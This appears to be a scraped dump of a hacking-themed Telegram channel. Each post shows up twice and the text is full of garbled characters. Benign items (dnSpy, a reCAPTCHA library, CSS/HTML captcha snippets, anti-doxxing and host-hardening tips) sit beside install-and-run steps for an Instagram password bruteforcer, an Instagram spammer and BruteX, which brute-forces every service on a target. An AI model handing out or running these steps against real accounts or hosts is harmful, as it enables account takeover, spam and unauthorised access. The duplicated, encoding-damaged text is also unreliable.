โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆDC/OS CLI Tunnel Subcommand
A DC/OS CLI subcommand that provides SOCKS proxy, HTTP proxy, and VPN access to your DC/OS cluster.
facebook.com/UndercOdeTestingCompanie
๐ฆโโโฃโข โโฃโโกโฃ
1) git clone git@github.com:dcos/dcos-tunnel.git
2) cd dcos-tunnel
3) Create a virtualenv for the project:
> make env
4) Try it out with:
./env/bin/dcos-tunnel
5) The VPN container lives at https://github.com/dcos/dcos-cli-vpn
6) Binary
> make binary
7) Run it with:
./dist/dcos-tunnel
8) Syntax check:
>make test
9) Syntax check + Integration test:
> sudo make test-binary
10) Single Integration test:
> sudo make test-binary-debug test=<test_name>
@UndercOdeOfficial
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆDC/OS CLI Tunnel Subcommand
A DC/OS CLI subcommand that provides SOCKS proxy, HTTP proxy, and VPN access to your DC/OS cluster.
facebook.com/UndercOdeTestingCompanie
๐ฆโโโฃโข โโฃโโกโฃ
1) git clone git@github.com:dcos/dcos-tunnel.git
2) cd dcos-tunnel
3) Create a virtualenv for the project:
> make env
4) Try it out with:
./env/bin/dcos-tunnel
5) The VPN container lives at https://github.com/dcos/dcos-cli-vpn
6) Binary
> make binary
7) Run it with:
./dist/dcos-tunnel
8) Syntax check:
>make test
9) Syntax check + Integration test:
> sudo make test-binary
10) Single Integration test:
> sudo make test-binary-debug test=<test_name>
@UndercOdeOfficial
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow To Avoid Dox Attack ?
>Doxxing is searching for and publishing personal information about a person publicly with malicious intent. Doxxing includes the hacker analyzing information posted online about the victim in order to identify and then harass the victim. It can also involve exposing an anonymous account to reveal the person's identity.
t.me/iOsDeveloppers
๐ฆโโโฃโข โโฃโโกโฃ
1) Vary Usernames and Passwords
Try to set unique usernames for each website you are signed up with. If you are signed up for a controversial website or forum, make sure your username is anonymous and cannot be traced back to you
2) Use Secure Passwords
Always use complex passwords, as they are more difficult to hack. Your password should be at least 12 characters with a mixture of upper and lower case letters, numbers, and other special keyboard characters.
3) Protect your Computer
Keep your system up to date and secure. Use an internet security or antivirus program to stay safe from malware, ransomware, and other threats. Make sure your security software checks for updates and installs them automatically. Furthermore, scan your system regularly, as this will alert you of any suspicious or malicious activity.
4) Protect Internet Communications
by using any trusted vpn provider
5) Social Privacy Settings
Social media plays a vital role in our daily lives. Millions of people spend their time, and often communicate with strangers, on multiple social media platforms and groups. These strangers could be a group of hackers with malicious doxxing intentions
@UndercOdeOfficial
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow To Avoid Dox Attack ?
>Doxxing is searching for and publishing personal information about a person publicly with malicious intent. Doxxing includes the hacker analyzing information posted online about the victim in order to identify and then harass the victim. It can also involve exposing an anonymous account to reveal the person's identity.
t.me/iOsDeveloppers
๐ฆโโโฃโข โโฃโโกโฃ
1) Vary Usernames and Passwords
Try to set unique usernames for each website you are signed up with. If you are signed up for a controversial website or forum, make sure your username is anonymous and cannot be traced back to you
2) Use Secure Passwords
Always use complex passwords, as they are more difficult to hack. Your password should be at least 12 characters with a mixture of upper and lower case letters, numbers, and other special keyboard characters.
3) Protect your Computer
Keep your system up to date and secure. Use an internet security or antivirus program to stay safe from malware, ransomware, and other threats. Make sure your security software checks for updates and installs them automatically. Furthermore, scan your system regularly, as this will alert you of any suspicious or malicious activity.
4) Protect Internet Communications
by using any trusted vpn provider
5) Social Privacy Settings
Social media plays a vital role in our daily lives. Millions of people spend their time, and often communicate with strangers, on multiple social media platforms and groups. These strangers could be a group of hackers with malicious doxxing intentions
@UndercOdeOfficial
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Telegram
iUNDERCODE IOS JAILBREAK SUPPORT & HELP
WELCOME TO iUNDERCODE BY UNDERCODE TESTING FOR IOS JAILBREAK & TWEAKS GROUP RULES @UNDERCODERULES
๐๐พ๐๐๐๐ฑ๐ ด
Youtube.com/c/Undercode
๐ ต๐ฐ๐ ฒ๐ ด๐ฑ๐พ๐พ๐ บ
@UndercOdeTesting
@iUNDERCODE
๐ ธ๐ ฝ๐๐๐ฐ๐ ถ๐๐ฐ๐ ผ
@UndercOdeTestinG
@iUNDERCODE
๐๐๐ ธ๐๐๐ ด๐
@iUNDERCODE
@UNDERCODENEWS
๐๐พ๐๐๐๐ฑ๐ ด
Youtube.com/c/Undercode
๐ ต๐ฐ๐ ฒ๐ ด๐ฑ๐พ๐พ๐ บ
@UndercOdeTesting
@iUNDERCODE
๐ ธ๐ ฝ๐๐๐ฐ๐ ถ๐๐ฐ๐ ผ
@UndercOdeTestinG
@iUNDERCODE
๐๐๐ ธ๐๐๐ ด๐
@iUNDERCODE
@UNDERCODENEWS
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ2019 updated : dnSpy is a debugger and .NET assembly editor. You can use it to edit and debug assemblies even if you don't have any source code available !
t.me/UnderCodeTestingOfficial
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone --recursive https://github.com/0xd4d/dnSpy.git
2) cd dnSpy
# or dotnet build
3) ./build.ps1
๐ฆFEATURES :
1) Debug .NET Framework, .NET Core and Unity game assemblies, no source code required
2) Set breakpoints and step into any assembly
3) Locals, watch, autos windows
4) Variables windows support saving variables (eg. decrypted byte arrays) to disk or view them in the hex editor (memory window)
5) Object IDs
6) Multiple processes can be debugged at the same time
7) Break on module load
8) Tracepoints and conditional breakpoints
9) Export/import breakpoints and tracepoints
10) Call stack, threads, modules, processes windows
11) Variables windows support evaluating C# / Visual Basic expressions
12) Dynamic modules can be debugged (but not dynamic methods due to CLR limitations)
13) Output window logs various debugging events, and it shows timestamps by default :)
14) Assemblies that decrypt themselves at runtime can be debugged, dnSpy will use the in-memory image. You can also force dnSpy to always use in-memory images instead of disk files.
15) Public API, you can write an extension or use the C# Interactive window to control the debugger
@UndercOdeOfficial
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ2019 updated : dnSpy is a debugger and .NET assembly editor. You can use it to edit and debug assemblies even if you don't have any source code available !
t.me/UnderCodeTestingOfficial
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone --recursive https://github.com/0xd4d/dnSpy.git
2) cd dnSpy
# or dotnet build
3) ./build.ps1
๐ฆFEATURES :
1) Debug .NET Framework, .NET Core and Unity game assemblies, no source code required
2) Set breakpoints and step into any assembly
3) Locals, watch, autos windows
4) Variables windows support saving variables (eg. decrypted byte arrays) to disk or view them in the hex editor (memory window)
5) Object IDs
6) Multiple processes can be debugged at the same time
7) Break on module load
8) Tracepoints and conditional breakpoints
9) Export/import breakpoints and tracepoints
10) Call stack, threads, modules, processes windows
11) Variables windows support evaluating C# / Visual Basic expressions
12) Dynamic modules can be debugged (but not dynamic methods due to CLR limitations)
13) Output window logs various debugging events, and it shows timestamps by default :)
14) Assemblies that decrypt themselves at runtime can be debugged, dnSpy will use the in-memory image. You can also force dnSpy to always use in-memory images instead of disk files.
15) Public API, you can write an extension or use the C# Interactive window to control the debugger
@UndercOdeOfficial
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ๐๐๐๐๐๐๐๐๐ NOW STARTS USING
> ๐๐๐๐๐๐ FOR HOST NEW PROJECTS & NEW FEATURES ON GITLUB:
https://gitlab.com/UndercOdeTesting
> AND ๐๐๐๐๐๐๐๐:
LinkeDin.com/in/UndercodeTesting
๐ฆYOU CAN CHECK in Description/Info On This Channel/Grp FOR MORE INFO & LINKS...
> ๐๐๐๐๐๐ FOR HOST NEW PROJECTS & NEW FEATURES ON GITLUB:
https://gitlab.com/UndercOdeTesting
> AND ๐๐๐๐๐๐๐๐:
LinkeDin.com/in/UndercodeTesting
๐ฆYOU CAN CHECK in Description/Info On This Channel/Grp FOR MORE INFO & LINKS...
GitLab
UndercOde Testing
UnderCode Testing Company : Starts at 2011 licensed & professional workers with ceh certificate and we already get two patended by Official Leb Ministry
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆA Android Vulnerability Testing :
Exploite & more
T.me/UndercOdeTestingOfficial
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
On your linux open terminal & type:
1) git clone https://github.com/AndroidVTS/android-vts
2) cd android-vts
3) You can import this project into AndroidStudio or use gradle from the CLI. You need the Android SDK and NDK installed to properly build this project. The gradle build files look for a local.properties:
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆA Android Vulnerability Testing :
Exploite & more
T.me/UndercOdeTestingOfficial
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
On your linux open terminal & type:
1) git clone https://github.com/AndroidVTS/android-vts
2) cd android-vts
3) You can import this project into AndroidStudio or use gradle from the CLI. You need the Android SDK and NDK installed to properly build this project. The gradle build files look for a local.properties:
cat local.properties
4) To build a debug APK with test signing keys:./gradlew assembleDebug
Build and install a debug build:./gradlew installDebug
Build a release (unsigned):./gradlew assembleRelease@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆCommon Types of Viruses Affecting Your Computer:
T.me/UndercOdeTesting
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) Resident Virus
Resident viruses live in your RAM memory. It can interfere with normal system operation which can lead to the corruption of files and programs. The most popular examples of resident viruses are CMJ, Meve, MrKlunky, and Randex.
2) Multipartite Virus
This type of virus can easily spread in your computer system. It is very infectious, performing unauthorized actions in your operating system, in folders, and other programs on the computer. They have the ability to infect both the executable files and the boots sector.
3) Direct Action Virus
Direct action viruses attack certain types of files, typically .exe and .com files. The main purpose of this virus is to replicate and infect files in folders. On the lighter note, they do not typically delete files or affect PC performance and speed. It can be easily removed by antivirus programs.
4) Browser Hijacker
This type of virus infects your web browser in which it will bring you to different websites. Typically, if you key in a domain name in the internet address bar, the browser hijacker will open multiple fake websites that may harm your computer. On the other hand, most trusted browsers have built-in features to block them ahead.
5) Overwrite Virus
From the name itself, this virus overwrites the content of a file, losing the original content. It infects folders, files, and even programs. To delete this virus, you also need to get rid of your file. Thus, it is important to back up your data.
6) Web Scripting Virus
This virus lives in certain links, ads, image placement, videos, and layout of a website. These may carry malicious codes in which when you click, the viruses will be automatically downloaded or will direct you to malicious websites.
6) Boot Sector Virus
Boot sector viruses affect floppy disks. They came to existence when floppy disks are important in booting a computer. Although they are not very common today, it is still causing other computer units, especially the outdated ones. Some examples include Polyboot.B and AntiEXE.
7) Macro Virus
Macro viruses target applications and software that contain macros. These viruses can carry out series of operations affecting the performance of the program or software. Some examples of macro viruses are O97M/Y2K, Bablas, Melissa.A, and Relax.
8) Directory Virus
Directory viruses change file paths. When you run programs and software that are infected with directory viruses, the virus program also runs in the background. Further, it may be difficult for you to locate the original app or software once infected with directory viruses.
9) Polymorphic Virus
Polymorphic viruses use a special method of encoding or encryption every time they infect a system. With this, antivirus software finds it hard to locate then using signature searches. They are also capable of replicating easily. Polymorphic viruses include Satan Bug, Elkern, Tuareg, and Marburg.
10) File Infector Virus
This virus also infects executable files or programs. When you run these programs, the file infector virus is activated as well which can slow down the program and produce other damaging effects. A large block of existing viruses belongs to this category.
11) Encrypted Virus
This type of virus uses encrypted malicious codes which make antivirus software hard to detect them. They can only be detected when they decrypt themselves during replication. Although they donโt delete files or folders, they can badly affect PC performance.
12) Companion Virus
This is a type of virus that doesnโt survive without accompanying an existing file or folder. In order to carry out damages, the file or folder being accompanied by companion viruses should be opened or run. Some examples of companion viruses include Terrax.1069, Stator, and Asimov.1539.
13) Network Virus
Basically, this type of virus spreads out through Local Network Area (LAN) and through the internet.
@UndercOdeOfficial
๐ฆCommon Types of Viruses Affecting Your Computer:
T.me/UndercOdeTesting
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) Resident Virus
Resident viruses live in your RAM memory. It can interfere with normal system operation which can lead to the corruption of files and programs. The most popular examples of resident viruses are CMJ, Meve, MrKlunky, and Randex.
2) Multipartite Virus
This type of virus can easily spread in your computer system. It is very infectious, performing unauthorized actions in your operating system, in folders, and other programs on the computer. They have the ability to infect both the executable files and the boots sector.
3) Direct Action Virus
Direct action viruses attack certain types of files, typically .exe and .com files. The main purpose of this virus is to replicate and infect files in folders. On the lighter note, they do not typically delete files or affect PC performance and speed. It can be easily removed by antivirus programs.
4) Browser Hijacker
This type of virus infects your web browser in which it will bring you to different websites. Typically, if you key in a domain name in the internet address bar, the browser hijacker will open multiple fake websites that may harm your computer. On the other hand, most trusted browsers have built-in features to block them ahead.
5) Overwrite Virus
From the name itself, this virus overwrites the content of a file, losing the original content. It infects folders, files, and even programs. To delete this virus, you also need to get rid of your file. Thus, it is important to back up your data.
6) Web Scripting Virus
This virus lives in certain links, ads, image placement, videos, and layout of a website. These may carry malicious codes in which when you click, the viruses will be automatically downloaded or will direct you to malicious websites.
6) Boot Sector Virus
Boot sector viruses affect floppy disks. They came to existence when floppy disks are important in booting a computer. Although they are not very common today, it is still causing other computer units, especially the outdated ones. Some examples include Polyboot.B and AntiEXE.
7) Macro Virus
Macro viruses target applications and software that contain macros. These viruses can carry out series of operations affecting the performance of the program or software. Some examples of macro viruses are O97M/Y2K, Bablas, Melissa.A, and Relax.
8) Directory Virus
Directory viruses change file paths. When you run programs and software that are infected with directory viruses, the virus program also runs in the background. Further, it may be difficult for you to locate the original app or software once infected with directory viruses.
9) Polymorphic Virus
Polymorphic viruses use a special method of encoding or encryption every time they infect a system. With this, antivirus software finds it hard to locate then using signature searches. They are also capable of replicating easily. Polymorphic viruses include Satan Bug, Elkern, Tuareg, and Marburg.
10) File Infector Virus
This virus also infects executable files or programs. When you run these programs, the file infector virus is activated as well which can slow down the program and produce other damaging effects. A large block of existing viruses belongs to this category.
11) Encrypted Virus
This type of virus uses encrypted malicious codes which make antivirus software hard to detect them. They can only be detected when they decrypt themselves during replication. Although they donโt delete files or folders, they can badly affect PC performance.
12) Companion Virus
This is a type of virus that doesnโt survive without accompanying an existing file or folder. In order to carry out damages, the file or folder being accompanied by companion viruses should be opened or run. Some examples of companion viruses include Terrax.1069, Stator, and Asimov.1539.
13) Network Virus
Basically, this type of virus spreads out through Local Network Area (LAN) and through the internet.
@UndercOdeOfficial
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆBEST APPS FOR CODING (special PYTHON) ON ANDROID:
Twitter.com/UnderCodeTC
๐ฆLETS START:
1) BeeWare
> https://pybee.org/
2) Chaquopy
> https://chaquo.com/chaquopy/
3) Kivy
> https://kivy.org/#home
4) Pyqtdeploy
> https://www.riverbankcomputing.com/software/pyqtdeploy/intro
5) QPython
> http://www.qpython.com/
6) SL4A
> https://github.com/damonkohler/sl4a
7) PySide
> https://wiki.qt.io/PySide
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆBEST APPS FOR CODING (special PYTHON) ON ANDROID:
Twitter.com/UnderCodeTC
๐ฆLETS START:
1) BeeWare
> https://pybee.org/
2) Chaquopy
> https://chaquo.com/chaquopy/
3) Kivy
> https://kivy.org/#home
4) Pyqtdeploy
> https://www.riverbankcomputing.com/software/pyqtdeploy/intro
5) QPython
> http://www.qpython.com/
6) SL4A
> https://github.com/damonkohler/sl4a
7) PySide
> https://wiki.qt.io/PySide
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆOfficial Instagram bruteforcer tool :
t.me/UndercOdeTestingOfficial
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/Pure-L0G1C/Instagram
2) cd instagram
3) pip3 install -r requirements.txt
4) python3 instagram.py <username> <wordlist> -m <mode>
5) Usage :
C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py -h
usage: instagram.py [-h] [-m MODE] username wordlist
positional arguments:
username email or username
wordlist password list
optional arguments:
-h, --help show this help message and exit
-m MODE, --mode MODE modes: 0 => 32 bots; 1 => 16 bots; 2 => 8 bots; 3 => 4 bots
USE FOR TESTIBNG ONLY !
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆOfficial Instagram bruteforcer tool :
t.me/UndercOdeTestingOfficial
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/Pure-L0G1C/Instagram
2) cd instagram
3) pip3 install -r requirements.txt
4) python3 instagram.py <username> <wordlist> -m <mode>
5) Usage :
C:\Users\Mohamed\Desktop\Instagram>python3 instagram.py -h
usage: instagram.py [-h] [-m MODE] username wordlist
positional arguments:
username email or username
wordlist password list
optional arguments:
-h, --help show this help message and exit
-m MODE, --mode MODE modes: 0 => 32 bots; 1 => 16 bots; 2 => 8 bots; 3 => 4 bots
USE FOR TESTIBNG ONLY !
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆInstagram Spammer by Linux Choise
t.me/iOsDeveloppers
> EASY & FAST
1) git clone https://github.com/thelinuxchoice/instaspam
2) cd instaspam
3) chmod 777 instaspam.sh
4) instaspam.sh
THATS ALL!
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆInstagram Spammer by Linux Choise
t.me/iOsDeveloppers
> EASY & FAST
1) git clone https://github.com/thelinuxchoice/instaspam
2) cd instaspam
3) chmod 777 instaspam.sh
4) instaspam.sh
THATS ALL!
@Mฬตอ ฬ ฬrฬถฬ.ฬตฬ ฬทอ BฬดอOฬทฬTฬถฬNฬดฬEฬถอTฬถฬ (tm
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Telegram
iUNDERCODE IOS JAILBREAK SUPPORT & HELP
WELCOME TO iUNDERCODE BY UNDERCODE TESTING FOR IOS JAILBREAK & TWEAKS GROUP RULES @UNDERCODERULES
๐๐พ๐๐๐๐ฑ๐ ด
Youtube.com/c/Undercode
๐ ต๐ฐ๐ ฒ๐ ด๐ฑ๐พ๐พ๐ บ
@UndercOdeTesting
@iUNDERCODE
๐ ธ๐ ฝ๐๐๐ฐ๐ ถ๐๐ฐ๐ ผ
@UndercOdeTestinG
@iUNDERCODE
๐๐๐ ธ๐๐๐ ด๐
@iUNDERCODE
@UNDERCODENEWS
๐๐พ๐๐๐๐ฑ๐ ด
Youtube.com/c/Undercode
๐ ต๐ฐ๐ ฒ๐ ด๐ฑ๐พ๐พ๐ บ
@UndercOdeTesting
@iUNDERCODE
๐ ธ๐ ฝ๐๐๐ฐ๐ ถ๐๐ฐ๐ ผ
@UndercOdeTestinG
@iUNDERCODE
๐๐๐ ธ๐๐๐ ด๐
@iUNDERCODE
@UNDERCODENEWS
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆPHP client library for reCAPTCHA, a free service to protect your website from spam and abuse gUIDE by UndercOde
Twitter.com/UndercOdeTc
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/google/recaptcha
2) cd recaptcha
3) Run the following command from your project directory to add the dependency:
composer require google/recaptcha "^1.2"
Alternatively, add the dependency directly to your composer.json file:
"require": {
"google/recaptcha": "^1.2"
}
4) This library comes in when you need to verify the user's response. On the PHP side you need the response from the reCAPTCHA service and secret key from your credentials. Instantiate the ReCaptcha class with your secret key, specify any additional validation rules, and then call verify() with the reCAPTCHA response and user's IP address. For example:
<?php
$recaptcha = new \ReCaptcha\ReCaptcha($secret);
$resp = $recaptcha->setExpectedHostname('recaptcha-demo.appspot.com')
->verify($gRecaptchaResponse, $remoteIp);
if ($resp->isSuccess()) {
// Verified!
} else {
$errors = $resp->getErrorCodes();
}
5) setExpectedHostname($hostname): ensures the hostname matches.
6) You must do this if you have disabled "Domain/Package Name Validation" for your credentials.
7) setExpectedApkPackageName($apkPackageName): if you're verifying a response from an Android app. Again, you must do this if you have disabled "Domain/Package Name Validation" for your credentials.
8) setExpectedAction($action): ensures the action matches for the v3 API.
9) setScoreThreshold($threshold): set a score threshold for responses from the v3 API
10) setChallengeTimeout($timeoutSeconds): set a timeout between the user passing the reCAPTCHA and your server processing it.
๐ฆEXAMPKLE :
Each of the set*() methods return the ReCaptcha instance so you can chain them together. For example:
<?php
$recaptcha = new \ReCaptcha\ReCaptcha($secret);
$resp = $recaptcha->setExpectedHostname('recaptcha-demo.appspot.com')
->setExpectedAction('homepage')
->setScoreThreshold(0.5)
->verify($gRecaptchaResponse, $remoteIp);
if ($resp->isSuccess()) {
// Verified!
} else {
$errors = $resp->getErrorCodes();
}
Written by UndercOde
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆPHP client library for reCAPTCHA, a free service to protect your website from spam and abuse gUIDE by UndercOde
Twitter.com/UndercOdeTc
๐ฆ๐โ๐๐๐ธ๐๐๐๐๐ธ๐๐๐โ & โ๐โ:
1) git clone https://github.com/google/recaptcha
2) cd recaptcha
3) Run the following command from your project directory to add the dependency:
composer require google/recaptcha "^1.2"
Alternatively, add the dependency directly to your composer.json file:
"require": {
"google/recaptcha": "^1.2"
}
4) This library comes in when you need to verify the user's response. On the PHP side you need the response from the reCAPTCHA service and secret key from your credentials. Instantiate the ReCaptcha class with your secret key, specify any additional validation rules, and then call verify() with the reCAPTCHA response and user's IP address. For example:
<?php
$recaptcha = new \ReCaptcha\ReCaptcha($secret);
$resp = $recaptcha->setExpectedHostname('recaptcha-demo.appspot.com')
->verify($gRecaptchaResponse, $remoteIp);
if ($resp->isSuccess()) {
// Verified!
} else {
$errors = $resp->getErrorCodes();
}
5) setExpectedHostname($hostname): ensures the hostname matches.
6) You must do this if you have disabled "Domain/Package Name Validation" for your credentials.
7) setExpectedApkPackageName($apkPackageName): if you're verifying a response from an Android app. Again, you must do this if you have disabled "Domain/Package Name Validation" for your credentials.
8) setExpectedAction($action): ensures the action matches for the v3 API.
9) setScoreThreshold($threshold): set a score threshold for responses from the v3 API
10) setChallengeTimeout($timeoutSeconds): set a timeout between the user passing the reCAPTCHA and your server processing it.
๐ฆEXAMPKLE :
Each of the set*() methods return the ReCaptcha instance so you can chain them together. For example:
<?php
$recaptcha = new \ReCaptcha\ReCaptcha($secret);
$resp = $recaptcha->setExpectedHostname('recaptcha-demo.appspot.com')
->setExpectedAction('homepage')
->setScoreThreshold(0.5)
->verify($gRecaptchaResponse, $remoteIp);
if ($resp->isSuccess()) {
// Verified!
} else {
$errors = $resp->getErrorCodes();
}
Written by UndercOde
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow to add css code to your website ?
t.me/UndercOdeTesting
๐ฆโโโฃโข โโฃโโกโฃ
Add css code
1) Copy the following code and add it to the bottom of your CSS file like the "style.css" or "coolstyle.css".
2) If you do not have a global css file you can add it to the <head> of your HTML page only if you include <style> opening and closing tags. View the source code of this page to see how it's used in the <head> section:
3) .capbox {
background-color: #92D433;
border: #B3E272 0px solid;
border-width: 0px 12px 0px 0px;
display: inline-block;
*display: inline; zoom: 1; /* FOR IE7-8 */
padding: 8px 40px 8px 8px;
}
.capbox-inner {
font: bold 11px arial, sans-serif;
color: #000000;
background-color: #DBF3BA;
margin: 5px auto 0px auto;
padding: 3px;
-moz-border-radius: 4px;
-webkit-border-radius: 4px;
border-radius: 4px;
}
#CaptchaDiv {
font: bold 17px verdana, arial, sans-serif;
font-style: italic;
color: #000000;
background-color: #FFFFFF;
padding: 4px;
-moz-border-radius: 4px;
-webkit-border-radius: 4px;
border-radius: 4px;
}
#CaptchaInput { margin: 1px 0px 1px 0px; width: 135px; }
Written by UndercOde
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow to add css code to your website ?
t.me/UndercOdeTesting
๐ฆโโโฃโข โโฃโโกโฃ
Add css code
1) Copy the following code and add it to the bottom of your CSS file like the "style.css" or "coolstyle.css".
2) If you do not have a global css file you can add it to the <head> of your HTML page only if you include <style> opening and closing tags. View the source code of this page to see how it's used in the <head> section:
3) .capbox {
background-color: #92D433;
border: #B3E272 0px solid;
border-width: 0px 12px 0px 0px;
display: inline-block;
*display: inline; zoom: 1; /* FOR IE7-8 */
padding: 8px 40px 8px 8px;
}
.capbox-inner {
font: bold 11px arial, sans-serif;
color: #000000;
background-color: #DBF3BA;
margin: 5px auto 0px auto;
padding: 3px;
-moz-border-radius: 4px;
-webkit-border-radius: 4px;
border-radius: 4px;
}
#CaptchaDiv {
font: bold 17px verdana, arial, sans-serif;
font-style: italic;
color: #000000;
background-color: #FFFFFF;
padding: 4px;
-moz-border-radius: 4px;
-webkit-border-radius: 4px;
border-radius: 4px;
}
#CaptchaInput { margin: 1px 0px 1px 0px; width: 135px; }
Written by UndercOde
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow Add cpatcha html code :
instagram.com/UndercOdeTestingCompany
Add captcha box Simple Example :
1) Copy the following code and add it to the main body of your HTML page inside the form between the <form> start and </form> end tags.
2) Add this code where you want the captcha box to appear, usually just above the <submit> button:
3)
<!-- START CAPTCHA -->
<br>
<div class="capbox">
<div id="CaptchaDiv"></div>
<div class="capbox-inner">
Type the above number:<br>
<input type="hidden" id="txtCaptcha">
<input type="text" name="CaptchaInput" id="CaptchaInput" size="15"><br>
</div>
</div>
<br><br>
<!-- END CAPTCHA -->
Written by UndercOde
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow Add cpatcha html code :
instagram.com/UndercOdeTestingCompany
Add captcha box Simple Example :
1) Copy the following code and add it to the main body of your HTML page inside the form between the <form> start and </form> end tags.
2) Add this code where you want the captcha box to appear, usually just above the <submit> button:
3)
<!-- START CAPTCHA -->
<br>
<div class="capbox">
<div id="CaptchaDiv"></div>
<div class="capbox-inner">
Type the above number:<br>
<input type="hidden" id="txtCaptcha">
<input type="text" name="CaptchaInput" id="CaptchaInput" size="15"><br>
</div>
</div>
<br><br>
<!-- END CAPTCHA -->
Written by UndercOde
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆAutomatically brute force all services running on a target 2019 updated
> Open ports
> Usernames
> Passwords
t.me/UndercOdeTesting
๐ฆโโโฃโข โโฃโโกโฃ
1) git clone https://github.com/1N3/BruteX
2) cd BruteX
3) ./install.sh
4) brutex target <port>
5) DOCKER:
>docker build -t brutex .
>docker run -it brutex target <port>
๐ฆTested by UndercOde
on debian
Written by UndercOde
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆAutomatically brute force all services running on a target 2019 updated
> Open ports
> Usernames
> Passwords
t.me/UndercOdeTesting
๐ฆโโโฃโข โโฃโโกโฃ
1) git clone https://github.com/1N3/BruteX
2) cd BruteX
3) ./install.sh
4) brutex target <port>
5) DOCKER:
>docker build -t brutex .
>docker run -it brutex target <port>
๐ฆTested by UndercOde
on debian
Written by UndercOde
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHow Secure My Host ?
Twitter.com/UndercOdeTc
1) Install and configure a host based firewall
2) Choose good passwords for any accounts on the system, and change any default or well known accounts on the machine
3) Install and keep up with operating system patches and also hardware firmware patches
4) Configure and continue to monitor logs on the device
